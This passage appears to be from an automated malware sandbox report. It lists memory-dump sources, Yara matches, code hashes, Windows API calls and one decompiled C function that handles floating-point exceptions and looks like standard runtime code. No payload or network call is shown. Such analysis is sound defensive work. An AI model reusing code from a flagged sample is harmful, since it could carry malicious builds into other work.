                                                  0x00404c45
                                                  0x00404c45
                                                  0x00404c48
                                                  0x00404c4a
                                                  0x00404c50
                                                  0x00404c57
                                                  0x00404c5a
                                                  0x00404c5c
                                                  0x00404c70
                                                  0x00404c75
                                                  0x00404ba4
                                                  0x00404baa
                                                  0x00404bae
                                                  0x00404bb6
                                                  0x00404bb6
                                                  0x00404bb6
                                                  0x00404bb8
                                                  0x00404bbb
                                                  0x00404bbe
                                                  0x00404bbe
                                                  0x00404bc4
                                                  0x00404b25
                                                  0x00404b28
                                                  0x00404b2a
                                                  0x00000000
                                                  0x00404b2c
                                                  0x00404b2c
                                                  0x00404b32
                                                  0x00404b37
                                                  0x00404b2a
                                                  0x00404bcb
                                                  0x00404bce
                                                  0x00404bd6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404a83
                                                  0x00404a58
                                                  0x00404a5a
                                                  0x00404ab4
                                                  0x00404ab9
                                                  0x00404ab9
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-2043925204
                                                  • Opcode ID: 238c64b91dc00fc8aa7441f00327e0ccbbd6587d23c937c2b2e4721a264c2311
                                                  • Instruction ID: ba1068fc9c078a1ad814dd17ce5e53bd1395a2ce151ae24c2f61dc23761eb13f
                                                  • Opcode Fuzzy Hash: 238c64b91dc00fc8aa7441f00327e0ccbbd6587d23c937c2b2e4721a264c2311
                                                  • Instruction Fuzzy Hash: 7C411AB16002196ACB249FB9DC49EBB77B8EBC4714F50427AFA05E72C0E674DD41CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0975E, Relevance: 2.8, APIs: 1, Instructions: 1338COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID:
                                                  • API String ID: 4168288129-0
                                                  • Opcode ID: 03c610b932e34c4943e00feac407a1e98f44f828b1dc76974e7330a0e9cafbcb
                                                  • Instruction ID: 02cf0647dbe53e204b23e86fa7e90d44236619e42a68a14c5362187b63440f51
                                                  • Opcode Fuzzy Hash: 03c610b932e34c4943e00feac407a1e98f44f828b1dc76974e7330a0e9cafbcb
                                                  • Instruction Fuzzy Hash: 2DC23871E046298FDB25CE28DD807EABBF5EB45304F1445EAD84EE7281E774AE818F41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A2A5, Relevance: 1.8, APIs: 1, Instructions: 269COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040A2A5(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00407FAF(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00407F15(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                                                  0x0040a2b3
                                                  0x0040a2ba
                                                  0x0040a2bf
                                                  0x0040a2c5
                                                  0x0040a2c8
                                                  0x0040a2ce
                                                  0x0040a2d3
                                                  0x0040a2d8
                                                  0x0040a2d8
                                                  0x0040a2de
                                                  0x0040a2e3
                                                  0x0040a2e8
                                                  0x0040a2e8
                                                  0x0040a2ef
                                                  0x0040a2f4
                                                  0x0040a2f9
                                                  0x0040a2f9
                                                  0x0040a300
                                                  0x0040a305
                                                  0x0040a30a
                                                  0x0040a30a
                                                  0x0040a311
                                                  0x0040a316
                                                  0x0040a31b
                                                  0x0040a31b
                                                  0x0040a323
                                                  0x0040a333
                                                  0x0040a345
                                                  0x0040a357
                                                  0x0040a36a
                                                  0x0040a37c
                                                  0x0040a384
                                                  0x0040a389
                                                  0x0040a38e
                                                  0x0040a38e
                                                  0x0040a395
                                                  0x0040a39a
                                                  0x0040a39a
                                                  0x0040a3a1
                                                  0x0040a3a6
                                                  0x0040a3a6
                                                  0x0040a3ad
                                                  0x0040a3b2
                                                  0x0040a3b2
                                                  0x0040a3b9
                                                  0x0040a3be
                                                  0x0040a3be
                                                  0x0040a3c8
                                                  0x0040a3ca
                                                  0x0040a404
                                                  0x0040a3cc
                                                  0x0040a3d1
                                                  0x0040a3f5
                                                  0x0040a3fd
                                                  0x0040a3f1
                                                  0x0040a3f1
                                                  0x0040a407
                                                  0x0040a40e
                                                  0x0040a410
                                                  0x0040a432
                                                  0x0040a43a
                                                  0x0040a43d
                                                  0x0040a43d
                                                  0x0040a43f
                                                  0x0040a43f
                                                  0x0040a44a
                                                  0x0040a450
                                                  0x0040a455
                                                  0x0040a45c
                                                  0x0040a496
                                                  0x0040a4a1
                                                  0x0040a4a7
                                                  0x0040a4aa
                                                  0x0040a4ad
                                                  0x0040a4b9
                                                  0x0040a4c1
                                                  0x0040a45e
                                                  0x0040a461
                                                  0x0040a46d
                                                  0x0040a473
                                                  0x0040a479
                                                  0x0040a47c
                                                  0x0040a485
                                                  0x0040a485
                                                  0x0040a4c4
                                                  0x0040a4d2
                                                  0x0040a4d8
                                                  0x0040a4df
                                                  0x0040a4e1
                                                  0x0040a4e1
                                                  0x0040a4e8
                                                  0x0040a4ea
                                                  0x0040a4ea
                                                  0x0040a4f1
                                                  0x0040a4f3
                                                  0x0040a4f3
                                                  0x0040a4fa
                                                  0x0040a4fc
                                                  0x0040a4fc
                                                  0x0040a503
                                                  0x0040a505
                                                  0x0040a505
                                                  0x0040a512
                                                  0x0040a515
                                                  0x0040a54c
                                                  0x0040a517
                                                  0x0040a517
                                                  0x0040a51a
                                                  0x0040a545
                                                  0x0040a53a
                                                  0x0040a53a
                                                  0x0040a54e
                                                  0x0040a556
                                                  0x0040a559
                                                  0x0040a578
                                                  0x0040a57d
                                                  0x0040a57d
                                                  0x0040a57f
                                                  0x0040a584
                                                  0x0040a590
                                                  0x0040a586
                                                  0x0040a589
                                                  0x0040a589
                                                  0x0040a595
                                                  0x0040a595
                                                  0x0040a55b
                                                  0x0040a55e
                                                  0x0040a56d
                                                  0x00000000
                                                  0x0040a56d
                                                  0x0040a560
                                                  0x0040a563
                                                  0x0040a565
                                                  0x0040a565
                                                  0x00000000
                                                  0x0040a563
                                                  0x0040a51c
                                                  0x0040a51f
                                                  0x0040a535
                                                  0x00000000
                                                  0x0040a535
                                                  0x0040a524
                                                  0x0040a526
                                                  0x0040a526
                                                  0x0040a524
                                                  0x00000000
                                                  0x0040a515
                                                  0x0040a417
                                                  0x0040a425
                                                  0x0040a42d
                                                  0x00000000
                                                  0x0040a42d
                                                  0x0040a41b
                                                  0x0040a420
                                                  0x0040a420
                                                  0x00000000
                                                  0x0040a41b
                                                  0x0040a3d8
                                                  0x0040a3e6
                                                  0x0040a3ee
                                                  0x00000000
                                                  0x0040a3ee
                                                  0x0040a3dc
                                                  0x0040a3e1
                                                  0x0040a3e1
                                                  0x0040a3dc

                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0040A2A0,?,?,00000008,?,?,00409F40,00000000), ref: 0040A4D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: e643de11c9a7a3b8f77e7df90059e9f175bcee2aa11d033e8018bcf56453dcfc
                                                  • Instruction ID: 9d579f0cae407368a1834575cb2af6ffccebdcf914ee91eecef0f970b264d7fa
                                                  • Opcode Fuzzy Hash: e643de11c9a7a3b8f77e7df90059e9f175bcee2aa11d033e8018bcf56453dcfc
                                                  • Instruction Fuzzy Hash: 81B17B355106089FD714CF28C48AB657BE0FF44364F258669E89ADF2E1C339E9A2CB46
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B121EF, Relevance: 1.8, APIs: 1, Instructions: 269COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,00B2353C,?,00000008,?,?,00B121EA,00B2353C,?,00000008,?,?,00B11D68,00000000), ref: 00B1241C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: ed91e03eef8b583c3c49416cd912b1051825b8599abc86a3ae51ffcdcb8eabe4
                                                  • Instruction ID: fc12d98dbad34a73109b28b86bc69b9c2fc41f94669453034269e641b31d2a13
                                                  • Opcode Fuzzy Hash: ed91e03eef8b583c3c49416cd912b1051825b8599abc86a3ae51ffcdcb8eabe4
                                                  • Instruction Fuzzy Hash: 63B15E31610609DFD719CF28C48ABA87BE0FF45364F658698E999CF2A1C335D9E1CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B059D7, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00AFC713: GetLastError.KERNEL32(00000008,?,00B06979), ref: 00AFC717
                                                    • Part of subcall function 00AFC713: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00AFC7BB
                                                  • EnumSystemLocalesW.KERNEL32(00B05B00,00000001,00000000,?,00AF335D,?,00B06134,00000000,?,?,?), ref: 00B05A49
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 23a50070f87fecb14e32a23aaba20e67d3eca100b249b6e37e16c3b9d2713602
                                                  • Instruction ID: ac953fe496573edc9d6e4bdcb6c9b8aa98bea35de9b28b3ac47913de7e3dd2d9
                                                  • Opcode Fuzzy Hash: 23a50070f87fecb14e32a23aaba20e67d3eca100b249b6e37e16c3b9d2713602
                                                  • Instruction Fuzzy Hash: DF1106362047059FDB28AF39C8916BBBBD1FB84368B19452CE94787A80D371A942CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B05A72, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00AFC713: GetLastError.KERNEL32(00000008,?,00B06979), ref: 00AFC717
                                                    • Part of subcall function 00AFC713: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00AFC7BB
                                                  • EnumSystemLocalesW.KERNEL32(00B05D50,00000001,00000000,?,00AF335D,?,00B060F8,00AF335D,?,?,?,?,?,00AF335D,?,?), ref: 00B05ABF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: ba6d6cf779f9f7a762b693b07e6265854ef31d770f630aacf44bcd3f9ebd2e51
                                                  • Instruction ID: cde20c7c599bf2d6a1f3f2a7701283401745e58593594df798477dcfbad85953
                                                  • Opcode Fuzzy Hash: ba6d6cf779f9f7a762b693b07e6265854ef31d770f630aacf44bcd3f9ebd2e51
                                                  • Instruction Fuzzy Hash: A4F0AF363007085FDB24AE399889ABB7FD1EB84368B19456DFA468BA90D7B15C418B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF8376, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00AF6394: EnterCriticalSection.KERNEL32(?,?,00B06521,?,00B24560,0000000C), ref: 00AF63A3
                                                  • EnumSystemLocalesW.KERNEL32(00AF8351,00000001,00B24140,0000000C,00AF8D0E,00000000,00000000), ref: 00AF83AE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 6b60913b44a0b297881049e9ed0c54aeb1f189d21de1441babeb6379512a6a4f
                                                  • Instruction ID: 630b5931c415abb21c57e3406c07597d0fd48119593748dc0228d09b398b5f84
                                                  • Opcode Fuzzy Hash: 6b60913b44a0b297881049e9ed0c54aeb1f189d21de1441babeb6379512a6a4f
                                                  • Instruction Fuzzy Hash: 31F04F32A50204AFDB20EFA8D946B5D3BE0FB04721F014256F514DF2E2CF7589459F44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0596E, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00AFC713: GetLastError.KERNEL32(00000008,?,00B06979), ref: 00AFC717
                                                    • Part of subcall function 00AFC713: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00AFC7BB
                                                  • EnumSystemLocalesW.KERNEL32(00B058C5,00000001,00000000,?,?,00B06156,00AF335D,?,?,?,?,?,00AF335D,?,?,?), ref: 00B059A5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 927ea0eea7ebd03e9f54478cdaa1bd02094203d2911b2c20184501b3262decad
                                                  • Instruction ID: 53b7ba1a8eaa0600d4b4bb025d298fe079258224e41d2e754ee4a350aa1aa320
                                                  • Opcode Fuzzy Hash: 927ea0eea7ebd03e9f54478cdaa1bd02094203d2911b2c20184501b3262decad
                                                  • Instruction Fuzzy Hash: 03F0E53A70020997DB24AF36D945ABBBFD4EFC1764B474098EA09CB6D0DB719842CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF84D1, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnumSystemLocalesW.KERNEL32(Function_00028351,00000001), ref: 00AF84EB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2099609381-0
                                                  • Opcode ID: dd2e8577c0b50e470a58cf094b624bb4226eec19d1a4f3d3d0a575daae2d03dc
                                                  • Instruction ID: 0468dc5644d2b7e0a3f6f48f95df291c59d7581f37e61a53400b9c0ebf8e296a
                                                  • Opcode Fuzzy Hash: dd2e8577c0b50e470a58cf094b624bb4226eec19d1a4f3d3d0a575daae2d03dc
                                                  • Instruction Fuzzy Hash: 60E08C725403046BEB28DF2AEC4EE5A3B53E3C0720F04C265F9084F1A9CF715482A688
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF8450, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnumSystemLocalesW.KERNEL32(Function_00028351,00000001), ref: 00AF8466
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2099609381-0
                                                  • Opcode ID: 13d77eae7fa7e4c3b193e1eb7635a6fc03c5c2bd72b9ee1472c9511d9bf99183
                                                  • Instruction ID: 9e46866108afaa1ea9435d47033291c9a8f766125d22a2f7b7ef00e31a52004c
                                                  • Opcode Fuzzy Hash: 13d77eae7fa7e4c3b193e1eb7635a6fc03c5c2bd72b9ee1472c9511d9bf99183
                                                  • Instruction Fuzzy Hash: 44E0EC716503009FEB28DF39EC49A593762E784711B1482A9B5008F1ADCF715486AB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AE0352, Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 3c2efbf0ff09b8a964bfc93f895e5a4dd84f3c70e6a9837cf0ed6f0c696ba4e8
                                                  • Instruction ID: bfda7e321f42103838d6c5e98bcc9f461632877b5da55025187df1d08c3dcdf7
                                                  • Opcode Fuzzy Hash: 3c2efbf0ff09b8a964bfc93f895e5a4dd84f3c70e6a9837cf0ed6f0c696ba4e8
                                                  • Instruction Fuzzy Hash: 3C6155306003CA97DA389B6B8A91FBE73A4EB55304F50441AEAC3DF2C1D6E19DC18B55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AE0A84, Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 809a57687354282a2d060d9ab2fa4c5602d0a12f5fcc799cf3d126e6d6d970ae
                                                  • Instruction ID: cee949089625e9d2d130f9f165e2a5ad39f27d544dbfcea45f43e191088a2a6e
                                                  • Opcode Fuzzy Hash: 809a57687354282a2d060d9ab2fa4c5602d0a12f5fcc799cf3d126e6d6d970ae
                                                  • Instruction Fuzzy Hash: BF617C716007CD56CE38AB2B8995FBF73A5FB51348F240A2AE447DB281E6E19DC2C345
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AE05C2, Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 52289db91b9aa5e5cf55ace9c8280e92f9ee4055234e5e246bd41c9552397c2e
                                                  • Instruction ID: 7ec28b45de09af15125ba438ae9aed0923f5fb86bcabd4ce764d6700b426733b
                                                  • Opcode Fuzzy Hash: 52289db91b9aa5e5cf55ace9c8280e92f9ee4055234e5e246bd41c9552397c2e
                                                  • Instruction Fuzzy Hash: 6B618B70600BCD9BDA349B6B4991FBF73A4EFA5300F54091AE483DB280E6E1ADD1CB45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AE0823, Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
